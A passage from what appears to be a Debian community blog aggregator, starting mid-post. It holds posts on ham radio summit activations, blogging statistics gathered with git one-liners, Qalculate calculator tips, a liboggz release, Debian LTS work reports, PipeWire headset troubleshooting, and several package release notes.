I cut through the woods to the west of the cottages, disturbing some deer and many, many pheasants, but I met the path fairly quickly. From there it was a 2km walk, 300m vertical ascent. Short and sharp!

At the top, I was treated to a view of the hill I had activated only an hour or so before, which is a view that always makes me smile:

To get some height for the feedpoint, I wrapped the coax around my winder a couple of turns and trapped it with the elastic while draping the coax over the trig. This bought me some more height and I felt clever because of it. Maybe a pole would be easier?

From here, I worked inter-G on 40m and had a wee pile up, eventually working 15 or so European stations on 20m. Pleased with that!

I had been considering a third hill, but home was the call in the failing light. Back to the car I walked to find my key didn’t have any battery, so out came the Audi App and I used the Internet of Things to unlock my car. The modern world is bizarre.

Sunday - Cloudy Head // Head in the Clouds

Sunday started off migraney, so I stayed within the confines of my house until I felt safe driving! After some back and forth in my cloudy head, I opted for the easier option of Ladylea Hill as I wasn’t feeling up for major physical exertion.

It was a long drive, after which I felt more wonky, but I hit the path eventually - I run to Hibby Standard Time, a few hours to a few days behind the rest of GM/ES. I was ready to bail if my head didn’t improve, but it turns out, fresh cold air, silence and bloodflow helped.

Ladylea Hill was incredibly quiet, a feature I really appreciated. It feels incredibly remote, with a long winding drive down Glenbuchat, which still has ice on the surface of the lochs and standing water.

A brooding summit crowned with grey cloud in fantastic scenery that only revealed itself upon the clouds blowing through:

I set up at the cairn and picked up 30 contacts overall, split between 40m and 20m, with some inter-G on 40 and a couple of continental surprises. 20 had longer skip today, so I saw Spain, Finland, Slovenia and Poland.

On teardown, I managed to snap the top segment of my brand new mast with my cold, clumsy fingers, but thankfully sotabeams stock replacements. More money at the problem, again.

Back to the car, no app needed, and homeward bound as the light faded.

At the end of the weekend, I find myself finally over 100 activator points and over 400 chaser points. Somehow I’ve collected more points this year already than last year, the winter bonuses really do stack up!

Addendum - OSMAnd & Open Street Map

I’ve been using OSMAnd on my iPhone quite extensively recently, I think offline mapping is super important if you’re going out to get mildly lost in the hills. On more than one occasion, I have confidently set off in the wrong direction in the mist, and maps have saved my bacon!

As you can download .gpx files, it’s great to have them on the device and available for guidance in case you get lost, coupled with an offline map. Plus, as I drive around I love to have the dark red of a hill I’ve walked appear on the map in my car dash or in my hand:

This weekend I discovered it’s possible to have height maps for nice 3d maps and contours marked on the map - you just need to download some additions for the maps. This is a really nice feature, it makes maps more pretty and more useful when you’re in the middle of nowhere.

Open Street Map also has designators for SOTA summits here, and similar for POTA here.

GM5ALX has set to adding the summits around Scotland here.

While the benefits aren’t immediately obvious, it allows developers of mapping applications access to more data at no extra cost, really. It helps add depth to an already rich set of information, and allows us as radio amateurs to do more interesting things with maps and not be shackled to Apple/Google.

Because it’s open data, we can also fix things we find wrong as users. I like to fix road surfaces after I’ve been cycling as that will feed forward to route planning through Komoot and data on my wahoo too, which can be modified with osm maps.

In the future, it’s possible to have an OSMAnd plugin highlighting local SOTA summits or mimicking features of sotl.as but offline.

It’s cool to be able to put open technologies to use like this in the field and really is the convergence point of all my favourite things!

09 February, 2025 08:00PM

Antoine Beaupré

A slow blogging year

Well, 2024 will be remembered, won't it? I guess 2025 already wants to make its mark too, but let's not worry about that right now, and instead let's talk about me.

A little over a year ago, I was gloating over how I had such a great blogging year in 2022, and was considering 2023 to be average, then went on to gather more stats and traffic analysis... Then I said, and I quote:

I hope to write more next year. I've been thinking about a few posts I could write for work, about how things work behind the scenes at Tor, that could be informative for many people. We run a rather old setup, but things hold up pretty well for what we throw at it, and it's worth sharing that with the world...

What a load of bollocks.

A bad year for this blog

2024 was the second worst year ever in my blogging history, tied with 2009 at a measly 6 posts for the year:

anarcat@angela:anarc.at$ curl -sSL https://anarc.at/blog/ | grep 'href="\./' | grep -o 20[0-9][0-9] | sort | uniq -c | sort -nr | grep -v 2025 | tail -3
      6 2024
      6 2009
      3 2014

I did write about my work though, detailing the migration from Gitolite to GitLab we completed that year. But after August, total radio silence until now.

Loads of drafts

It's not that I have nothing to say: I have no less than five drafts in my working tree here, not counting three actual drafts recorded in the Git repository here:

anarcat@angela:anarc.at$ git s blog
## main...origin/main
?? blog/bell-bot.md
?? blog/fish.md
?? blog/kensington.md
?? blog/nixos.md
?? blog/tmux.md
anarcat@angela:anarc.at$ git grep -l '\!tag draft'
blog/mobile-massive-gallery.md
blog/on-dying.mdwn
blog/secrets-recovery.md

I just don't have time to wrap those things up. I think part of me is disgusted by seeing my work stolen by large corporations to build proprietary large language models while my idols have been pushed to suicide for trying to share science with the world.

Another part of me wants to make those things just right. The "tagged drafts" above are nothing more than a huge pile of chaotic links, far from being useful for anyone else than me, and even then.

The on-dying article, in particular, is becoming my nemesis. I've been wanting to write that article for over 6 years now, I think. It's just too hard.

Writing elsewhere

There's also the fact that I write for work already. A lot. Here are the top-10 contributors to our team's wiki:

anarcat@angela:help.torproject.org$ git shortlog --numbered --summary --group="format:%al" | head -10
  4272  anarcat
   423  jerome
   117  zen
   116  lelutin
   104  peter
    58  kez
    45  irl
    43  hiro
    18  gaba
    17  groente

... but that's a bit unfair, since I've been there half a decade. Here's the last year:

anarcat@angela:help.torproject.org$ git shortlog --since=2024-01-01 --numbered --summary --group="format:%al" | head -10
   827  anarcat
   117  zen
   116  lelutin
    91  jerome
    17  groente
    10  gaba
     8  micah
     7  kez
     5  jnewsome
     4  stephen.swift

So I still write the most commits! But to truly get a sense of the amount I wrote in there, we should count actual changes. Here it is by number of lines (from commandlinefu.com):

anarcat@angela:help.torproject.org$ git ls-files | xargs -n1 git blame --line-porcelain | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
  99046 Antoine Beaupré
   6900 Zen Fu
   4784 Jérôme Charaoui
   1446 Gabriel Filion
   1146 Jerome Charaoui
    837 groente
    705 kez
    569 Gaba
    381 Matt Traudt
    237 Stephen Swift

That, of course, is the entire history of the git repo, again. We should take only the last year into account, and probably ignore the tails directory, as sneaky Zen Fu imported the entire docs from another wiki there...

anarcat@angela:help.torproject.org$ find [d-s]* -type f -mtime -365 | xargs -n1 git blame --line-porcelain 2>/dev/null | sed -n 's/^author //p' | sort -f | uniq -ic | sort -nr | head -10
  75037 Antoine Beaupré
   2932 Jérôme Charaoui
   1442 Gabriel Filion
   1400 Zen Fu
    929 Jerome Charaoui
    837 groente
    702 kez
    569 Gaba
    381 Matt Traudt
    237 Stephen Swift

Pretty good! 75k lines. But those are the files that were modified in the last year. If we go a little more nuts, we find that:

anarcat@angela:help.torproject.org$ git-count-words-range.py | sort -k6 -nr | head -10
parsing commits for words changes from command: git log '--since=1 year ago' '--format=%H %al'
anarcat 126116 - 36932 = 89184
zen 31774 - 5749 = 26025
groente 9732 - 607 = 9125
lelutin 10768 - 2578 = 8190
jerome 6236 - 2586 = 3650
gaba 3164 - 491 = 2673
stephen.swift 2443 - 673 = 1770
kez 1034 - 74 = 960
micah 772 - 250 = 522
weasel 410 - 0 = 410

I wrote 126,116 words in that wiki, only in the last year. I also deleted 37k words, so the final total is more like 89k words, but still: that's about forty (40!) articles of the average size (~2k) I wrote in 2022.

(And yes, I did go nuts and write a new log parser, essentially from scratch, to figure out those word diffs. I did get the courage only after asking GPT-4o for an example first, I must admit.)
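The core of the idea fits in a pipeline, though. Here is a rough sketch (not the actual script, which does more bookkeeping), relying on git's porcelain word-diff format, where added runs start with + and removed runs with -:

git log --since='1 year ago' --format='WORDSTATS %al' -p --word-diff=porcelain |
awk '
  /^WORDSTATS /         { author = $2; next }        # sentinel line with the author
  /^\+\+\+ / || /^--- / { next }                     # skip the diff file headers
  /^\+/                 { add[author] += NF; next }  # rough word count, added run
  /^-/                  { del[author] += NF; next }  # rough word count, removed run
  END {
    for (a in add)
      printf "%s %d - %d = %d\n", a, add[a], del[a], add[a] - del[a]
  }
'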

Let's celebrate that again: I wrote 90 thousand words in that wiki in 2024. According to Wikipedia, a "novella" is 17,500 to 40,000 words, which would mean I wrote about a novella and a novel, in the past year.

But interestingly, if I look at the repository analytics, I certainly didn't write that much more in the past year. So that alone cannot explain the lull in my production here.

Arguments

Another part of me is just tired of the bickering and arguing on the internet. I have at least two articles in there that I suspect are going to get me a lot of push-back (NixOS and Fish). I know how to deal with this: you need to write well, consider the controversy, spell it out, and defuse things before they happen. But that's hard work and, frankly, I don't really care that much about what people think anymore.

I'm not writing here to convince people. I stopped evangelizing a long time ago. Now, I'm more into documenting, and teaching. And, while teaching, there's a two-way interaction: when you give a speech or workshop, people can ask questions, or respond, and you all learn something. When you document, you quickly get told "where is this? I couldn't find it" or "I don't understand this" or "I tried that and it didn't work" or "wait, really? shouldn't we do X instead", and you learn.

Here, it's static. It's my little soapbox where I scream in the void. The only thing people can do is scream back.

Collaboration

So.

Let's see if we can work together here.

If you don't like something I say, disagree, or find something wrong or to be improved, instead of screaming on social media or ignoring me, try contributing back. This site here is backed by a git repository and I promise to read everything you send there, whether it is an issue or a merge request.

I will, of course, still read comments sent by email or IRC or social media, but please, be kind.

You can also, of course, follow the latest changes on the TPA wiki. If you want to catch up with the last year, some of the "novellas" I wrote include:

(Well, no, you can't actually follow changes on a GitLab wiki. But we have a wiki-replica git repository where you can see the latest commits, and subscribe to the RSS feed.)

See you there!

09 February, 2025 04:19PM

Qalculate hacks

This is going to be a controversial statement because some people are absolute nerds about this, but, I need to say it.

Qalculate is the best calculator that has ever been made.

I am not going to try to convince you of this, I just wanted to put out my bias out there before writing down those notes. I am a total fan.

This page will collect my notes of cool hacks I do with Qalculate. Most examples are copy-pasted from the command-line interface (qalc(1)), but I typically use the graphical interface as it's slightly better at displaying complex formulas. Discoverability is obviously also better for the cornucopia of features this fantastic application ships.

Qalc commandline primer

On Debian, Qalculate's CLI interface can be installed with:

apt install qalc

Then you start it with the qalc command, and end up on a prompt:

anarcat@angela:~$ qalc
> 

Then it's a normal calculator:

anarcat@angela:~$ qalc
> 1+1

  1 + 1 = 2

> 1/7

  1 / 7 ≈ 0.1429

> pi

  pi ≈ 3.142

> 

There's a bunch of variables to control display, approximation, and so on:

> set precision 6
> 1/7

  1 / 7 ≈ 0.142857
> set precision 20
> pi

  pi ≈ 3.1415926535897932385

When I need more, I typically browse around the menus. One big issue I have with Qalculate is that there are a lot of menus and features. I had to fiddle quite a bit to figure out that set precision command above. I might add more examples here as I find them.
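(One discoverability tip, assuming a reasonably recent qalc: the interactive help command lists what is available, and asking for help on a specific command documents its options, including all those display knobs:)

> help
> help set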

Bandwidth estimates

I often use the data units to estimate bandwidths. For example, here's what 1 megabit per second is over a month ("about 300 GiB"):

> 1 megabit/s * 30 day to gibibyte 

  (1 megabit/second) × (30 days) ≈ 301.7 GiB

Or, "how long will it take to download X", in this case, 1GiB over a 100 mbps link:

> 1GiB/(100 megabit/s)

  (1 gibibyte) / (100 megabits/second) ≈ 1 min + 25.90 s

Password entropy

To calculate how much entropy (in bits) a given password structure provides, you count the number of possibilities in each entry (say, [a-z] is 26 possibilities, "one word in a 8k dictionary" is 8000), take the base-2 logarithm of that, and multiply by the number of entries; in other words, entropy = entries × log₂(possibilities per entry).

For example, an alphabetic 14-character password is:

> log2(26*2)*14

  log₂(26 × 2) × 14 ≈ 79.81

... 80 bits of entropy. To get the equivalent in a Diceware password with an 8000-word dictionary, you would need:

> log2(8k)*x = 80

  (log₂(8 × 1000) × x) = 80 ≈

  x ≈ 6.170

... about 6 words, which gives you:

> log2(8k)*6

  log₂(8 × 1000) × 6 ≈ 77.79

78 bits of entropy.

Exchange rates

You can convert between currencies!

> 1 EUR to USD

  1 EUR ≈ 1.038 USD

Even fake ones!

> 1 BTC to USD

  1 BTC ≈ 96712 USD

This relies on a database pulled from the internet (typically the European Central Bank rates, see the source). It will prompt you if it's too old:

It has been 256 days since the exchange rates last were updated.
Do you wish to update the exchange rates now? y

As a reader pointed out, you can set the refresh rate for currencies, as some countries will require way more frequent exchange rates.

The graphical version has a little graphical indicator that, when you mouse over, tells you where the rate comes from.

Other conversions

Here are other neat conversions extracted from my history

> teaspoon to ml

  teaspoon = 5 mL

> tablespoon to ml

  tablespoon = 15 mL

> 1 cup to ml 

  1 cup ≈ 236.6 mL

> 6 L/100km to mpg

  (6 liters) / (100 kilometers) ≈ 39.20 mpg

> 100 kph to mph

  100 kph ≈ 62.14 mph

> (108km - 72km) / 110km/h

  ((108 kilometers) − (72 kilometers)) / (110 kilometers/hour) ≈
  19 min + 38.18 s

Completion time estimates

This is a more involved example I often do.

Background

Say you have started a long running copy job and you don't have the luxury of having a pipe you can insert pv(1) into to get a nice progress bar. For example, rsync or cp -R can have that problem (but not tar!).

(Yes, you can use --info=progress2 in rsync, but that estimate is incremental and therefore inaccurate unless you disable the incremental mode with --no-inc-recursive, but then you pay a huge up-front wait cost while the entire directory gets crawled.)

Extracting a process start time

First step is to gather data. Find the process start time. If you were unfortunate enough to forget to run date --iso-8601=seconds before starting, you can get a similar timestamp with stat(1) on the process tree in /proc with:

$ stat /proc/11232
  File: /proc/11232
  Size: 0               Blocks: 0          IO Block: 1024   directory
Device: 0,21    Inode: 57021       Links: 9
Access: (0555/dr-xr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2025-02-07 15:50:25.287220819 -0500
Modify: 2025-02-07 15:50:25.287220819 -0500
Change: 2025-02-07 15:50:25.287220819 -0500
 Birth: -

So our start time is 2025-02-07 15:50:25, we shave off the nanoseconds there, they're below our precision noise floor.
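(A terser variant, assuming GNU stat, extracts just that timestamp:)

$ stat -c '%y' /proc/11232
2025-02-07 15:50:25.287220819 -0500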

If you're not dealing with an actual UNIX process, you need to figure out a start time: this can be a SQL query, a network request, whatever, exercise for the reader.

Saving a variable

This is optional, but for the sake of demonstration, let's save this as a variable:

> start="2025-02-07 15:50:25"

  save("2025-02-07T15:50:25"; start; Temporary; ; 1) =
  "2025-02-07T15:50:25"

Estimating data size

Next, estimate your data size. That will vary wildly with the job you're running; it can be anything: number of files, documents being processed, rows to be destroyed in a database, whatever. In this case, rsync tells me how many bytes it has transferred so far:

# rsync -ASHaXx --info=progress2 /srv/ /srv-zfs/
2.968.252.503.968  94%    7,63MB/s    6:04:58  xfr#464440, ir-chk=1000/982266) 

Strip off the weird dots in there, because they will confuse Qalculate, which will count this as:

  2.968252503968 bytes ≈ 2.968 B

Or, essentially, three bytes. We actually transferred almost 3TB here:

  2968252503968 bytes ≈ 2.968 TB

So let's use that. If you had the misfortune of making rsync silent, but were lucky enough to transfer entire partitions, you can use df (without -h! we want to be more precise here), in my case:

Filesystem              1K-blocks       Used  Available Use% Mounted on
/dev/mapper/vg_hdd-srv 7512681384 7258298036  179205040  98% /srv
tank/srv               7667173248 2870444032 4796729216  38% /srv-zfs

(Otherwise, of course, you use du -sh $DIRECTORY.)

Digression over bytes

Those are 1K blocks, which are actually (and rather unfortunately) Ki, or "kibibytes" (1024 bytes), not "kilobytes" (1000 bytes). Ugh.

> 2870444032 KiB

  2870444032 kibibytes ≈ 2.939 TB
> 2870444032 kB

  2870444032 kilobytes ≈ 2.870 TB

At this scale, those details matter quite a bit, we're talking about a 69GB (64GiB) difference here:

> 2870444032 KiB - 2870444032 kB

  (2870444032 kibibytes) − (2870444032 kilobytes) ≈ 68.89 GB

Anyways. Let's take 2968252503968 bytes as our current progress.

Our entire dataset is 7258298064 KiB, as seen above.

Solving a cross-multiplication

We have 3 out of four variables for our equation here, so we can already solve:

> (now-start)/x = (2996538438607 bytes)/(7258298064 KiB) to h

  ((actual − start) / x) = ((2996538438607 bytes) / (7258298064
  kibibytes))

  x ≈ 59.24 h

The entire transfer will take about 60 hours to complete! Note that's not the time left, that is the total time.

To break this down step by step, we could calculate how long it has taken so far:

> now-start

  now − start ≈ 23 h + 53 min + 6.762 s

> now-start to s

  now − start ≈ 85987 s

... and do the cross-multiplication manually, it's basically:

x/(now-start) = (total/current)

so:

x = (total/current) * (now-start)

or, in Qalc:

> ((7258298064  kibibytes) / ( 2996538438607 bytes) ) *  85987 s

  ((7258298064 kibibytes) / (2996538438607 bytes)) × (85987 seconds) ≈
  2 d + 11 h + 14 min + 38.81 s

It's interesting it gives us different units here! Not sure why.
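For comparison, the same cross-multiplication also fits in a few lines of plain shell, for the times a calculator is not at hand. A rough sketch, assuming GNU date and reusing the figures above (integer seconds only):

start=$(date -d '2025-02-07 15:50:25' +%s)
now=$(date +%s)
done_bytes=2996538438607
total_bytes=$((7258298064 * 1024))   # the df figure is in KiB
elapsed=$((now - start))
total=$((elapsed * total_bytes / done_bytes))
echo "ETA: $(date -d @$((start + total)))"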

Now and built-in variables

The now here is actually a built-in variable:

> now

  now ≈ "2025-02-08T22:25:25"

There is a bewildering list of such variables, for example:

> uptime

  uptime = 5 d + 6 h + 34 min + 12.11 s

> golden

  golden ≈ 1.618

> exact

  golden = (√(5) + 1) / 2

Computing dates

In any case, yay! We know the transfer is going to take roughly 60 hours total, and we've already spent around 24h of that, so, we have 36h left.

But I did that all in my head, we can ask more of Qalc yet!

Let's make another variable, for that total estimated time:

> total=(now-start)/x = (2996538438607 bytes)/(7258298064 KiB)

  save(((now − start) / x) = ((2996538438607 bytes) / (7258298064
  kibibytes)); total; Temporary; ; 1) ≈
  2 d + 11 h + 14 min + 38.22 s

And we can plug that into another formula with our start time to figure out when we'll be done!

> start+total

  start + total ≈ "2025-02-10T03:28:52"

> start+total-now

  start + total − now ≈ 1 d + 11 h + 34 min + 48.52 s

> start+total-now to h

  start + total − now ≈ 35 h + 34 min + 32.01 s

That transfer has ~1d left, or 35h34m32s, and should complete around 4 in the morning on February 10th.

But that's icing on top. I typically only do the cross-multiplication and calculate the remaining time in my head.

I mostly did the last bit to show Qalculate could compute dates and time differences, as long as you use ISO timestamps. Although it can also convert to and from UNIX timestamps, it cannot parse arbitrary date strings (yet?).

Other functionality

Qalculate can:

  • Plot graphs;
  • Use RPN input;
  • Do all sorts of algebraic, calculus, matrix, statistics, trigonometry functions (and more!);
  • ... and so much more!

I have a hard time finding things it cannot do. When I get there, I typically need to resort to writing Python code or using a spreadsheet; others will turn to more complete engines like Maple, Mathematica or R.

But for daily use, Qalculate is just fantastic.

And it's pink! Use it!

Further reading and installation

This is just scratching the surface; the fine manual has more information, including more examples. There is also of course a qalc(1) manual page which ships an excellent EXAMPLES section.

Qalculate is packaged for over 30 Linux distributions, but also ships packages for Windows and MacOS. There are third-party derivatives as well including a web version and an Android app.

Updates

Colin Watson liked this blog post and was inspired to write his own hacks, similar to what's here, but with extras, check it out!

09 February, 2025 04:09AM

Petter Reinholdtsen

New oggz release 1.1.2 after 15 years

A little over a week ago, I noticed the liboggz package on my Debian dashboard had not had a new upstream release for a while. A closer look showed that its last release, version 1.1.1, happened in 2010. A few patches had accumulated in the Debian package, and I even noticed that I had passed on these patches to upstream five years ago. A handful of crash bugs had been reported against the Debian package, and looking at the upstream repository I even found a few crash bugs reported there too. To add insult to injury, I discovered that upstream had accumulated several fixes in the years between 2010 and now, and many of them had not made their way into the Debian package. I decided enough was enough, and that a new upstream release was needed to fix these nasty crash bugs. Luckily I am also a member of the Xiph team, aka upstream, and could actually get to work immediately to fix it.

I started by adding automatic build testing on the Xiph gitlab oggz instance, to get a better idea of the state of affairs with the code base. This exposed a few build problems, which I had to fix. In parallel to this, I sent an email announcing my wish for a new release to every person who had committed to the upstream code base since 2010, and asked for help doing a new release both by email and on the #xiph IRC channel. Sadly only a fraction of their email providers accepted my email. But Ralph Giles in the Xiph team came to the rescue and provided invaluable help to guide me through the Xiph release process. While this was going on, I spent a few days tracking down the crash bugs with good help from valgrind, and came up with patch proposals to get rid of at least these specific crash bugs. The open issues also had to be checked. Several of them proved to be fixed already, but a few I had to create patches for. I also checked out the Debian, Arch, Fedora, Suse and Gentoo packages to see if there were patches applied in these Linux distributions that should be passed upstream. The end result was ready yesterday. A new liboggz release, version 1.1.2, was tagged, wrapped up and published on the project page. And today, the new release was uploaded into Debian.
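For reference, hunting crashes like these mostly means running the oggz tools on the offending files under valgrind. A generic example, not the exact command used (the file name is a placeholder):

valgrind --leak-check=full --track-origins=yes oggz-validate crashing-sample.ogg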

You are probably by now curious about what actually changed in the library. I guess the most interesting new feature was support for Opus and VP8. Almost all other changes were stability or documentation fixes. The rest were related to the gitlab continuous integration testing. All in all, this was really a minor update, hence the version bump only from 1.1.1 to 1.1.2, but it was long overdue and I am very happy that it is out the door.

One change proposed upstream was not included this time, as it extended the API and changed some of the existing library methods, and would thus require a major SONAME bump and possibly code changes in every program using the library. As I am not that familiar with the code base, I am unsure if I am the right person to evaluate the change. Perhaps later.

Since the release was tagged, a few minor fixes have been committed upstream already: automatic testing of cross-building to Windows, and documentation updates linking to the correct project page. If an important issue is discovered with this release, I guess a new release might happen soon including these minor fixes. If not, perhaps they can wait fifteen years. :)

I would like to send a big thank you to everyone that helped make this release happen, from the people adding fixes upstream over the course of fifteen years, to the ones reporting crash bugs, other bugs and those maintaining the package in various Linux distributions. Thank you very much for your time and interest.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

09 February, 2025 12:15AM

February 08, 2025

Thorsten Alteholz

My Debian Activities in January 2025

Debian LTS

This was my hundred-twenty-seventh month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:

  • [DLA 4014-1] gnuchess security update to fix one CVE related to arbitrary code execution via crafted PGN (Portable Game Notation) data.
  • [DLA 4015-1] rsync update to fix five CVEs related to leaking information from the server or writing files outside of the client’s intended destination.
  • [DLA 4015-2] rsync update to fix an upstream regression.
  • [DLA 4039-1] ffmpeg update to fix three CVEs related to possible integer overflows, double-free on errors and out-of-bounds access.

As new CVEs for ffmpeg appeared, I started to work again on an update of this package.

Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.

Debian ELTS

This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on:

  • [ELA-1290-1] rsync update to fix five CVEs in Buster, Stretch and Jessie related to leaking information from the server or writing files outside of the client’s intended destination.
  • [ELA-1290-2] rsync update to fix an upstream regression.
  • [ELA-1313-1] ffmpeg update to fix six CVEs in Buster related to possible integer overflows, double-free on errors and out-of-bounds access.
  • [ELA-1314-1] ffmpeg update to fix six CVEs in Stretch related to possible integer overflows, double-free on errors and out-of-bounds access.

As new CVEs for ffmpeg appeared, I started to work again on an update of this package.

Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.

Debian Printing

This month I uploaded new packages or new upstream or bugfix versions of:

  • brlaser new upstream release (in new upstream repository)

This work is generously funded by Freexian!

Debian Matomo

This month I uploaded new packages or new upstream or bugfix versions of:

This work is generously funded by Freexian!

Debian Astro

This month I uploaded new packages or new upstream or bugfix versions of:

  • calceph sponsored upload of new upstream version
  • libxisf sponsored upload of new upstream version

Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers and maybe the results of his work will already be part of Trixie.

Debian IoT

Unfortunately I didn’t find any time to work on this topic.

Debian Mobcom

This month I uploaded new packages or new upstream or bugfix versions of:

misc

This month I uploaded new upstream or bugfix versions of:

FTP master

This month I accepted 385 and rejected 37 packages. The overall number of packages that got accepted was 402.

08 February, 2025 06:41PM by alteholz

hackergotchi for Erich Schubert

Erich Schubert

Azul’s State-of-Java report is nonsense

Azul’s State-of-Java report is full of nonsense, and not worth looking at.

The report claims various stuff about the adoption of AI in the Java ecosystem.

But its results do not make any sense when looked at in detail.

For example (in the AI section):

  • Figure 21 (“which programming languages to code AI”) has more bars in the chart than labels.
  • Figure 22 (“which Java AI libraries”) clearly is nonsense, because, e.g.:
    • top-ranked “JavaML” is not even on maven, and has not received updates since 2016
    • second-ranked “Deep Java Library (DIL)” would correctly be abbreviated DJL
    • third-ranked “OpenCL” is not a Java library, but a language on its own
    • fourth-ranked is PyTorch. Clearly not Java either
    • fifth-ranked is Jvector. Which is a database
    • seventh-ranked is TensorFlow, again not Java
    • 11th Apache Jena is an RDF app framework, not AI
    • 13th Apache Mahout is dead, and has become a Python quantum computing POC, Qumat

I can only guess that people picked some random plausible answer, but were not actually using any of that. Probably because of bad incentives:

Participants were offered token compensation for their participation.

Seems like Dimensional Research, the company who did that survey, screwed up badly.

08 February, 2025 03:50PM by Erich Schubert

February 07, 2025

hackergotchi for Emmanuel Kasper

Emmanuel Kasper

Wireless headset dongle not detected by PulseAudio

For whatever reason, when I plug and unplug my wireless headset dongle over USB, it is not always detected by the PulseAudio/Pipewire stack which runs our desktop sound on Linux these days. But we can fix that with a restart of the handling daemon, see below.
In PulseAudio terminology an input device (microphone) is called a source, and an output device a sink.

When the headset dongle is plugged in, we can see it on the USB bus:

$ lsusb | grep Headset 
Bus 001 Device 094: ID 046d:0af7 Logitech, Inc. Logitech G PRO X 2 Gaming Headset

The device is detected correctly as a Human Interface Device (HID) device:

$ dmesg
...
[310230.507591] input: Logitech Logitech G PRO X 2 Gaming Headset as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.1/1-1.1.4/1-1.1.4:1.3/0003:046D:0AF7.0060/input/input163
[310230.507762] hid-generic 0003:046D:0AF7.0060: input,hiddev2,hidraw11: USB HID v1.10 Device [Logitech Logitech G PRO X 2 Gaming Headset] on usb-0000:00:14.0-1.1.4/input

However it is not seen in the list of sources / sinks of PulseAudio:

$ pactl list short sinks
58      alsa_output.usb-Lenovo_ThinkPad_Thunderbolt_3_Dock_USB_Audio_000000000000-00.analog-stereo      PipeWire        s16le 2ch 48000Hz       IDLE
62      alsa_output.pci-0000_00_1f.3.analog-stereo      PipeWire        s32le 2ch 48000Hz       SUSPENDED
95      bluez_output.F4_4E_FD_D2_97_1F.1        PipeWire        s16le 2ch 48000Hz       IDLE

This unfriendly list shows my docking station, which has a small jack connector for a wired cable, the built-in speaker of my laptop, and a bluetooth headset.

If I restart Pipewire,

$ systemctl --user restart pipewire

then the headset appears as a possible audio output.

$ pactl list short sinks
54      alsa_output.usb-Lenovo_ThinkPad_Thunderbolt_3_Dock_USB_Audio_000000000000-00.analog-stereo      PipeWire        s16le 2ch 48000Hz       SUSPENDED
56      alsa_output.usb-Logitech_Logitech_G_PRO_X_2_Gaming_Headset_0000000000000000-00.analog-stereo    PipeWire        s16le 2ch 48000Hz       SUSPENDED
58      alsa_output.pci-0000_00_1f.3.analog-stereo      PipeWire        s32le 2ch 48000Hz       SUSPENDED
77      bluez_output.F4_4E_FD_D2_97_1F.1        PipeWire        s16le 2ch 48000Hz       SUSPENDED

Once you have set the default input / output device, for me in Gnome, you can check it with:

$ pactl info | egrep '(Sink|Source)'
Default Sink: alsa_output.usb-Logitech_Logitech_G_PRO_X_2_Gaming_Headset_0000000000000000-00.analog-stereo
Default Source: alsa_input.usb-Logitech_Logitech_G_PRO_X_2_Gaming_Headset_0000000000000000-00.mono-fallback

Finally let us play some test sounds:

$ speaker-test --test wav --nloops 1 --channels 2

And test some recording; you will hear the output around one second after speaking (yes, that is recorded audio sent over a Unix pipe for playback!):

# don't do this when the output is a speaker, this will create audio feedback (larsen effect)
$ arecord -f cd - | aplay
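Since this comes up every time the dongle is replugged, a small shell function bundling the commands above saves some typing (a convenience sketch, adjust to taste):

refresh-audio() {
    # restart the user's PipeWire so hotplugged devices are re-enumerated
    systemctl --user restart pipewire
    sleep 1   # give the daemon a moment to settle
    pactl list short sinks
}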

07 February, 2025 03:29PM by Manu

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

zigg 0.0.2 on CRAN: Micromaintenance

benchmark chart

The still very new package zigg which arrived on CRAN a week ago just received a micro-update at CRAN. zigg provides the Ziggurat pseudo-random number generator (PRNG) for Normal, Exponential and Uniform draws proposed by Marsaglia and Tsang (JSS, 2000), and extended by Leong et al. (JSS, 2005). This PRNG is lightweight and very fast: on my machine speedups for the Normal, Exponential, and Uniform are on the order of 7.4, 5.2 and 4.7 times faster than the default generators in R as illustrated in the benchmark chart borrowed from the git repo.

As I wrote last week in the initial announcement, I had picked up their work in package RcppZiggurat and updated its code for the 64-bit world we now live in. That package already provided the Normal generator along with several competing implementations which it compared rigorously and timed. As one of the generators was based on the GNU GSL via the implementation of Voss, we always ended up with a run-time dependency on the GSL too. No more: this new package is zero-dependency, zero-suggests and hence very easy to deploy. Moreover, we also include a demonstration of four distinct ways of accessing the compiled code from another R package: pure and straight-up C, similarly pure C++, inclusion of the header in C++ as well as via Rcpp. The other advance is the resurrection of the second generator for the Exponential distribution. And following Burkardt we expose the Uniform too. The main upside of these generators is their excellent speed, as can be seen in the comparison against the default R generators generated by the example script timings.R.

Needless to say, speed is not everything. This PRNG comes from the time of 32-bit computing, so the generator period is likely to be shorter than that of newer high-quality generators. If in doubt, forgo speed and stick with the high-quality default generators.

This release essentially just completes the DESCRIPTION file and README.md now that this is a CRAN package. The short NEWS entry follows.

Changes in version 0.0.2 (2025-02-07)

  • Complete DESCRIPTION and README.md following initial CRAN upload

Courtesy of my CRANberries, there is a diffstat report relative to the previous release. For more information, see the package page or the git repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

07 February, 2025 02:29PM

Reproducible Builds (diffoscope)

diffoscope 288 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 288. This version includes the following changes:

[ Chris Lamb ]
* Add 'asar' to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS. (Closes: #1095057)
* Update minimal 'black' version.
* Update copyright years.

You find out more by visiting the project homepage.

07 February, 2025 12:00AM